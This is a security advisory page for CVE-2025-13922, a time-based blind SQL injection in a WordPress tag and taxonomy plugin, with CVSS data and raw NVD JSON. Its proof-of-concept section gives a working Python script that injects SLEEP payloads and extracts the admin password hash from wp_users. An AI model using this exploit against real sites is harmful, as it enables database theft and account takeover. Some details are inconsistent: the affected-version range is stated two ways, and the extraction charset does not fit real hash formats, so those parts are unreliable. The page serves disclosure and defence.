Security Vulnerability Report
CVE-2025-13922 CVSS 6.5 MEDIUM

CVE-2025-13922

Published: 2025-12-06 05:16:44
Last Modified: 2026-04-15 00:35:42

Description

The Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'existing_terms_orderby' parameter in the AI preview AJAX endpoint in all versions up to, and including, 3.40.1. This is due to insufficient escaping on user-supplied parameters and lack of SQL query parameterization. This makes it possible for authenticated attackers, with Contributor-level access and above who have AI metabox permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, cause performance degradation, or enable data inference through time-based techniques.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Simple Tags plugin < 3.40.1 (all versions up to and including 3.40.1 are affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import time

target_url = "https://target-site.com/wp-admin/admin-ajax.php"

# Authentication credentials with Contributor role and AI metabox permissions
auth = {
    "username": "attacker",
    "password": "password123"
}

session = requests.Session()

# Login to WordPress
login_url = "https://target-site.com/wp-login.php"
session.post(login_url, data=auth)


# POC: Time-based Blind SQL Injection via existing_terms_orderby parameter
# This payload tests if the vulnerability exists by causing a 5-second delay
def test_sqli():
    """
    Test for CVE-2025-13922: SQL Injection in Simple Tags plugin
    The 'existing_terms_orderby' parameter is vulnerable to time-based blind SQL injection
    """
    # Payload to test vulnerability - causes delay if vulnerable
    # This extracts the first character of the database user
    payload = "term_id AND (SELECT CASE WHEN (SUBSTRING((SELECT user()),1,1)='r') THEN SLEEP(5) ELSE 0 END)"
    params = {
        "action": "stax_ai_preview_terms",  # AI preview AJAX action
        "existing_terms_orderby": payload,
        "taxonomy": "post_tag"
    }
    start_time = time.time()
    response = session.get(target_url, params=params)
    elapsed_time = time.time() - start_time
    if elapsed_time >= 5:
        print("[+] Vulnerability confirmed! Time-based SQL injection works.")
        print(f"[+] Response time: {elapsed_time:.2f} seconds")
    else:
        print("[-] Vulnerability not detected or target not vulnerable")
        print(f"[-] Response time: {elapsed_time:.2f} seconds")


def extract_data():
    """
    Extract database information using time-based blind SQL injection
    This is a simplified example - real attacks would iterate through all characters
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789_@"
    result = ""
    for pos in range(1, 33):  # Extract 32 characters (typical hash length)
        for char in charset:
            payload = f"term_id AND (SELECT CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{pos},1)='{char}') THEN SLEEP(2) ELSE 0 END)"
            params = {
                "action": "stax_ai_preview_terms",
                "existing_terms_orderby": payload,
                "taxonomy": "post_tag"
            }
            start_time = time.time()
            session.get(target_url, params=params)
            elapsed_time = time.time() - start_time
            if elapsed_time >= 2:
                result += char
                print(f"[+] Extracted so far: {result}")
                break
    print(f"[+] Final result: {result}")


if __name__ == "__main__":
    test_sqli()

References

https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/inc/class.admin.php#L1406
https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/modules/taxopress-ai/classes/TaxoPressAiAjax.php#L180
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3408243%40simple-tags%2Ftrunk&old=3388829%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=#file17
https://research.cleantalk.org/cve-2025-13922/
https://www.wordfence.com/threat-intel/vulnerabilities/id/f40cc632-c6af-4c8b-a455-76319f7fe151?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13922",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-06T05:16:44.397",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'existing_terms_orderby' parameter in the AI preview AJAX endpoint in all versions up to, and including, 3.40.1. This is due to insufficient escaping on user-supplied parameters and lack of SQL query parameterization. This makes it possible for authenticated attackers, with Contributor-level access and above who have AI metabox permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, cause performance degradation, or enable data inference through time-based techniques."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/inc/class.admin.php#L1406",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/modules/taxopress-ai/classes/TaxoPressAiAjax.php#L180",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3408243%40simple-tags%2Ftrunk&old=3388829%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=#file17",
        "source": "[email protected]"
      },
      {
        "url": "https://research.cleantalk.org/cve-2025-13922/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f40cc632-c6af-4c8b-a455-76319f7fe151?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}